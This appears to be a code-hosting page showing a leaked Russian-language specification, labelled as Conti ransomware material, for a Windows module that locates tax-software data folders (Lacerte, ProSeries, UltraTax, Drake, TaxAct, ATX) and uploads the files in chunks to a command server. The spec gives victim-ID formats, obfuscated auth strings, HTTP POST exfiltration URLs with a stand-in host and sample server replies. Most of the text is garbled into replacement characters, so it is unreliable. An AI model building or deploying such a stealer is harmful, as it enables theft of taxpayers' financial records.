Conti Ransomware malware leak WITH LOCKER
You can not select more than 25 topics Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.

204 lines
9.1 KiB

  1. ������� ������ ��� ����������� ������ � ����������
  2. ����������� �������
  3. ���������� ��������� - ����� � ����������� ������ � ����������
  4. �������� � ����������
  5. ��������� ������ ���� ��������� ��� .exe-����, �� ����������� ���������� � ��������� ������.
  6. ��������� �������� ����� �������� (�������� ��� ������� � ������� Windows):
  7. - 2018 Lacerte Tax
  8. - ProSeries 2018
  9. - UltraTax CS 2018
  10. - TaxWise 2018 on C Drive
  11. - ATX 2018
  12. ��������� ���� ��������� ����� � ����� �� ������� ������������ ����:
  13. - DRAKE18/DT
  14. - UT18DATA
  15. - 18tax/IData
  16. (��������� - ��� �����, ������� ������������ �� Data)
  17. - 18Data
  18. - UTS18/database + UTS18/Users + UTS18/password.18
  19. - TaxAct 2018 Professional Edition/Client Data
  20. ����� ����� ���������� �������� - �.�. ����� �� ������ ����� DT, � ����� DT ������ ����� DRAKE18.
  21. ����� �������������������.
  22. ����� 18 � ��������� ����� - ��� ����� ���� (2018) - ��� ������� ����������� �� 16 �� 18.
  23. ��������� ������ ���������:
  24. 1. ���� �� ������� ����� � � ������� ������ ����� (Documents, Downloads) ������ �� ��������� ���������:
  25. - DRAKE18.EXE
  26. - DSTART.EXE
  27. - utw18.exe
  28. - w18tax.exe
  29. - protax18.exe
  30. - TWW17.exe
  31. - TaxAct18.exe
  32. - Sfs.ServerHost.exe
  33. - ATX.exe
  34. (17, 18 - ������ �����, ��������� ���� �� 16 �� 18).
  35. ���� ������� ���, ������ ����� ������ ������ �� ���������� �����������, �.�. �� ����������� ��������������� ���������.
  36. ��������� ������.
  37. 2. ������� � ����� C:, ���� �� ����� � ������ ������� ������ ������ ������ ��� ��������,
  38. ������� �� ��������� �����:
  39. C:\ProWin18\18data
  40. C:\ProNet18\18data
  41. C:\Lacerte\18tax\******Data
  42. C:\WinCSI\UT18DATA
  43. C:\DRAKE18\DT
  44. C:\ProgramData\Wolters Kluwer\ATX 2018 Server
  45. C:\UTS18
  46. C:\2018 Lacerte Tax
  47. C:\ProSeries 2018
  48. C:\UltraTax CS 2018
  49. C:\TaxWise 2017
  50. �����, ������� ��� ����� ������� ������ �� ������� �����.
  51. �����: �� �� ������������� ����� ����� ���������� ������� ����������.
  52. 3. ���� �� ������ �����, ������� �������.
  53. 4. ������ ����������� ����� �� ������! ����� ��������� ������ ������� ��������� - ���� �� ������ ������ ���� ��������� ������ ��������,
  54. ���������� �����.
  55. 5. ���� ��� ������� ������� ���� �� ������ �������� ������ File is busy ��� ����������� (����������������� � ����������
  56. ����� ������ ���������), ���� � ������ ������� �� ������ 1 � ������� ���.
  57. ���� ������ �� �����������, ���������� ���� � ����� � ���������� �����.
  58. ����� ���������� ������������ ���� ������, ���������� ������������ ��� ��-���������� �����,
  59. ������� �� ������� � 10 ����� ����� ������ ��������� ������� - � ��� �� �������������.
  60. 6. ����� ���������� �� ��������� �������� ������.
  61. 7. ������ ���������� ��������� PROMPT.
  62. � ���� ���������� ����� ���������� �� ������� ��� DOS/Windows ����������� ��������� ������,
  63. � ������ ������������� ���������.
  64. ������ ������ �� ����������� , (�������) �� ��� �����:
  65. - Client ID
  66. - Group ID
  67. - IP address
  68. ���� ������ �� �������� (����� ������ ��� ������), ��� ����� �� ����� �� �����, ��������� �������� ���� ����� ��:
  69. Client ID: %MACHINE%-%USER%_W%winver%.%hex32% (���������� �� �����, ������������ ����)
  70. Group ID: nop000
  71. IP address: 0.0.0.0
  72. Id ������� - ��� ������, ��������� �� ���� ����������� ����������� ������.
  73. ������ ����� ����� ������ %MACHINE%-%USER%_XYYYYYYY, ���
  74. MACHINE - ��� ����������
  75. USER - ��� �����
  76. X - ������ ������������ ��� ������� �� ������� �������� ������
  77. (W - windows, L - linux, A - �������, M - Mac OS),
  78. YYYYYYY - 3-7 ���� ���������� major-version, minor-version � build ������������ ������� ���� ������� ������� � ������
  79. (��������, ��� 6.1 build 7600 ��� ����� 617600).
  80. ������ ����� �������� 32 ��������� �������� 0-9, A-F.
  81. ������ id ������� - HOSTNAME-USER_W617600.11223344556677889900AABBCCDDEEFF.
  82. �������� �� ������������ � ��������.
  83. 8. ��� �������� ������ �� ���� (�������� HTTP), ��� HTTP-����, �� ������������ � 200, �������� �������.
  84. ��� �������� �������� (��� ��-200 ��� ���������� ������) ������ ������������� ������ ������� � ��������� � ��� � �������.
  85. 9. ����� ������� ���������� � ���������.
  86. ��������� ������ ����� �������� ��� �� HTTP, ��� � �� HTTPS - ��� ����� ����� ������������ ������� WinInet/WinHTTP.
  87. 10. ��������� ������ ������� ���� � ����� ����� ����������.
  88. ���������� ������
  89. 1. ���� ������ ���������� Microsoft, �� ������ ������� ������ Microsoft Visual Studio ������ �� ���� 2015.
  90. 2. ������ Visual Studio ������ ���� �������� ��������� �������:
  91. * ��� ���� �������� ������:
  92. - �������� �������: $(SolutionDir)Bin\$(PlatformTarget)\$(Configuration)\
  93. - ������������� �������: $(SolutionDir)\obj\$(Platform)\$(Configuration)\$(ProjectName)\
  94. - ����������������� ����������: ��
  95. * ������� Release:
  96. - ������ ���������� ���������� (�/�++ �������� ����): ���
  97. - ��������� ���������� ���������� (�����������/�������): ���
  98. 3. ������ ������������� ����������� Andrivet (���������, ��.������ _STR())
  99. 4. ��������� ������ ������������� ����������� GetApi.h. ���� ������������, ���������� ���������� ����� ������ �������.
  100. 5. ������ ������ ����� ��� ������ - x32- � x64-���������.
  101. 6. � ������ ������ ������ ���� ������������� �� ��������� ������, �������� ��������� ���������� �����.
  102. 7. ������ ������ ����� ���������� ������. ���������� ����� ������ ���������� � modulename.log (���� � ���� ������������� � �������).
  103. ������ ������ ���� ������ ��������� ��������� ����� � ��������� �� �������.
  104. 8. � ������� ������ ���� ���� �������� config.h (�������� �������, ����� ���� - ����� ��� ���������� ��������� - ����, �������-������������� �������� ���������� ���).
  105. 9. ������ ������ �������� �� ���� ����������� ������� Windows.
  106. ����������� �������������� ������ Windows - Windows XP (���� ���������� - Windows Vista).
  107. 10. ������������� � ���������� ������ ����������� ���� notelemetry.obj (https://stackoverflow.com/questions/37761768/how-to-prevent-visual-studio-2015-update-2-to-add-telemetry-main-invoke-trigger)
  108. �������� �������� ������
  109. 1) �� ������ ������������ �������� ���������� � ���������� ����� HTTP POST � ���������� multipart/form-data (���������� ������� �������� html-�����).
  110. POST �������� ��������� ����:
  111. timestamp - ��������� UNIX-�����
  112. ip - ���� IP address
  113. ip1 - ����� ������� �������� ���������� (� ������ ���������� ���� � ���������� �������� ����������� �� ������������; ���������������)
  114. ip2 - ����� ������� �������� ����������
  115. ...
  116. ipN - ����� N-�� �������� ����������
  117. cid - ���� Client ID
  118. group - ���� Group ID
  119. hostname - ��� �����, ���������� ����� GetComputerName()
  120. source - ������ `tax'
  121. �������� ���������� �� url ����:
  122. http://foo.com/<junk>/<auth>/<junk>
  123. junk - ������������ �������, ���������� � URI, ����� ����� /
  124. auth - ������������ ������. ��������������, ��� ��� ��� ���������� ������,
  125. ������ ����� ������� ������������ ���� ������.
  126. ��� - ������ ����� �����.
  127. � ��� �����������:
  128. - ����� Z � ����� �������
  129. - ����� ���� (�� �����!) � 6 �� 15-� ������� ������ ���� 31.
  130. ������� ����� ���� - ������. � ��������� ��� ����� ���������� � Z.
  131. ������ ������ - abcde7ol7k9hi8mZ
  132. 2) ����� ������������ ������ ���� �� ������, �������� HTTP POST, � ���������� multipart/form-data.
  133. ���� ���������� � ���� file.
  134. ��� ����� ������� �� ���� Content-Disposition; ��� ���������� ����� �� URI ������������.
  135. ��� ����:
  136. - �������� ����� ���������� � �����. � �������, ���� ���� ������ 100�, �� ���������� ��������� 10� �����.
  137. - ����� �������� ����� ����� � ��������� �������������, ��������� ���������� ���������, � ���������� ��������� �����.
  138. - ����� ���������, ������������ ����� ����� �������� � ������ � ��������� ���������� gzip.
  139. - �������� ������������ �� URL ����
  140. http://foo.com/<junk>/<auth>/<cid>/<filename>/<start>/<end>/<eof>
  141. ���
  142. junk - ������������ �������, ���������� � URI, ����� ����� /
  143. auth - ������������ ������. ��� - ������ ����� �����, � ������� �����������
  144. - ����� S � ����� �������
  145. - ����� ���� (�� �����!) � 8 �� 15-� ������� ������ ���� 25.
  146. cid - ���� Client ID
  147. filename - ��� ����� � ��������� URL Encoded
  148. start - ��������� �������� ������������� ����� ������������ ������ �����; ����� ��������� � �����, � �����.
  149. �� ��������� �������� ������ �����, � ������� ��������� � ������.
  150. ��������, 0A -- ��� ����� 0 (����� 0 ��������, ����� A ������������).
  151. end - �������� �������� ������������� ����� ������������ ������ �����; ������� �� ��, ��� � ��� start.
  152. ��������, 3A5A2A3A9A5A9A - ��� 3523959.
  153. eof - ������� ����� �����. ���� ������� ����, ��� ��������� ����� �����; � �������� (������ ��������������)
  154. ��� ������ ����� �����, � ������� �����������:
  155. - ������ ����� ������ ��� 0
  156. - ��������� ����� A ��� F
  157. ��� ��������� ������, ��� HTTP-������ 200 �� ������� �� ������ ��������,
  158. �� ��� ��-200 ������� � �������� �������� (��������, 50* ��� 40* �� ������).
  159. ������ ��� �������� ���������� ������ XML � ���� HTTP-������, ������ ���� <response>.
  160. ��� ��������� ���� ������ ���� 4041, ���������� ������ 1 - ��� ���������� ��� ������ ������� (������� ������ �� ����� �������).
  161. ��������, ��������� ����� ��������������� �� ������ � ����� 9:
  162. HTTP/1.1 200 OK
  163. Server: nginx/1.10.3 (Ubuntu)
  164. Date: Mon, 07 Oct 2019 13:08:44 GMT
  165. Content-Type: application/xml; charset=UTF-8
  166. Transfer-Encoding: chunked
  167. Connection: keep-alive
  168. Vary: Accept
  169. <?xml version="1.0" encoding="UTF-8"?>
  170. <response>4049</response>
  171. ��������� ����� - ������ ����, ��� ��
  172. HTTP/1.1 200 OK
  173. Server: nginx/1.10.3 (Ubuntu)
  174. Date: Mon, 07 Oct 2019 13:08:44 GMT
  175. Content-Type: application/xml; charset=UTF-8
  176. Transfer-Encoding: chunked
  177. Connection: keep-alive
  178. Vary: Accept
  179. <?xml version="1.0" encoding="UTF-8"?>
  180. <response>200</response>